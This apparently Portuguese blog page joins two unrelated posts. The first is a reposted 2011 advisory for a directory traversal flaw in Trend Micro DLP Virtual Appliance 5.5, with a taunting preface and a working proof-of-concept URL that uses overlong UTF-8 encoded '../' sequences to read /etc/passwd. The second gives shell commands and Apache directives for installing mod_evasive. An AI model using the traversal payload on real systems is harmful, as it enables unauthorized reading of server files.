Trend Micro Data Loss Prevention Virtual Appliance 5.5 Directory Traversal


Para quem acha que trend micro é semi-divino, cry more trend micro fan boys!

Software: Trend Micro Data Loss Prevention Virtual Appliance 5.5
Vulnerability: Directory Traversal
Threat Level: Serious (5/5)
Download: Product/Product/DLP/5.5/Manager/5.5_GM/DLPVA- 5.5.1294-i386-DVD.iso
Discovery Date: 27/05/2011
Remote: Yes

Author Site Email: Luis Martinez, Sergio Lopez,White Hat Consultores Sergio López Luis Martínez

A directory traversal vulnerability, can be exploited to read files outside of the web root.

PoC Exploit:
https://IP:8443/dsc//%c0%ae%c0%ae/%c0%ae%c0%ae/%c 0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%a e%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c 0%ae/%c0%ae%c0%ae/etc/passwd

PDF Advisory:


How to install mod evasive, como instalar o mod evasive


Para instalar o mod evasive em seu cpanel use:

tar -xzvf mod_evasive_1.10.1.tar.gz
cd mod_evasive_1.10.1
/usr/local/apache/bin/apxs -i -a -c mod_evasive20.c
/usr/local/apache/bin/apachectl restart

Após entre no conf do apache e edite o mesmo:


<IfModule mod_evasive20.c>
DOSHashTableSize 3097
DOSPageCount 2
DOSSiteCount 50
DOSPageInterval 1
DOSSiteInterval 1
DOSBlockingPeriod 10

Após reinicie o apache:

service httpd restart